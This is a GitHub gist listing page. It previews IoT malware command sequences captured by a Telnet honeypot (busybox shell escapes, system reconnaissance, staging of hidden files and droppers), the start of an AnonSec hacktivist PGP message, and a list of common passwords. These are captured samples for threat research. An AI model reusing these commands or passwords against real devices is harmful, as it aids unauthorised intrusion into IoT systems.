Skip to content

Instantly share code, notes, and snippets.

View odolezal's full-sized avatar
😎
Hack The Planet!

Ondřej Doležal odolezal

😎
Hack The Planet!
View GitHub Profile
@odolezal
odolezal / Shrew_malware_example_1
Created October 25, 2019 11:47
Catched by Telnet-Iot-Honeypot
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
@odolezal
odolezal / OpNasaDrones
Created October 25, 2019 11:48
OpNasaDrones
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Version: OpNasaDrones
pub 4096R/4AAE63E0 2015-10-01
Key fingerprint = DEFD 83DD 81B5 A61D 9959 C009 4CFF 6773 4AAE 63E0
uid AnonSec (Nihil Verum Est Omnia Licita) <An0nsec@protonmail.ch>
.8. b. 8 ,o888888o. b. 8 d888888o. 8 8888888888 ,o888888o.
.888. 888o. 8 . 8888 `88. 888o. 8 .`8888:' `88. 8 8888 8888 `88.
@odolezal
odolezal / Gopher_malware_sample_1
Created October 25, 2019 13:29
Catched by Telnet-Iot-Honeypot
enable
shell
sh
linuxshell
bah
hostname Ex0_1761
/bin/busybox Ex0
/bin/busybox ps; /bin/busybox Ex0
/bin/busybox cat /proc/mounts; /bin/busybox Ex0
/bin/busybox echo -e '\x45\x78\x30\x31/proc' > /proc/.nipped; /bin/busybox cat /proc/.nipped; /bin/busybox rm /proc/.nipped
@odolezal
odolezal / Ferret_malware_sample_1
Created October 25, 2019 13:37
Catched by Telnet-Iot-Honeypot
enable
system
shell
sh
cat /proc/mounts; /bin/busybox RFIZK
cd /tmp; cat .s || cp /bin/echo .s; /bin/busybox RFIZK
tftp; wget; /bin/busybox RFIZK
dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
/bin/busybox RFIZK
>.s; cp .s .i
@odolezal
odolezal / Camel_malware_sample_1
Created October 26, 2019 07:32
Catched by Telnet-Iot-Honeypot
enable
shell
sh
/bin/busybox LOLKEK
/bin/busybox ps; /bin/busybox LOLKEK
/bin/busybox cat /proc/mounts; /bin/busybox LOLKEK
/bin/busybox echo -e '\x66\x75\x63\x6b/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x66\x75\x63\x6b/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x66\x75\x63\x6b/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x66\x75\x63\x6b/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
@odolezal
odolezal / Gopher_malware_sample_2
Created October 26, 2019 21:00
Catched by Telnet-Iot-Honeypot
enable
shell
sh
linuxshell
bah
hostname Ex0_3860
/bin/busybox Ex0
/bin/busybox ps; /bin/busybox Ex0
/bin/busybox cat /proc/mounts; /bin/busybox Ex0
/bin/busybox echo -e '\x45\x78\x30\x31/proc' > /proc/.nipped; /bin/busybox cat /proc/.nipped; /bin/busybox rm /proc/.nipped
@odolezal
odolezal / Okapi_malware_sample_1
Created October 27, 2019 21:33
Catched by Telnet-Iot-Honeypot
enable
system
shell
sh
ping ; sh
linuxshell; /bin/busybox LMAO
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox LMAO
/bin/busybox LMAO
>/tmp/.file && cd /tmp/
/bin/busybox rm -rf .file .z.binary .z.dropper
@odolezal
odolezal / Gemsbok_malware_sample_1
Created November 6, 2019 20:18
Catched by Telnet-Iot-Honeypot
enable
system
shell
sh
linuxshell
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
@odolezal
odolezal / led-blink.py
Last active December 11, 2019 19:36
Random LED blinking for Cytron Maker pHAT
password
123456
12345678
1234
qwerty
12345
dragon
pussy
baseball
football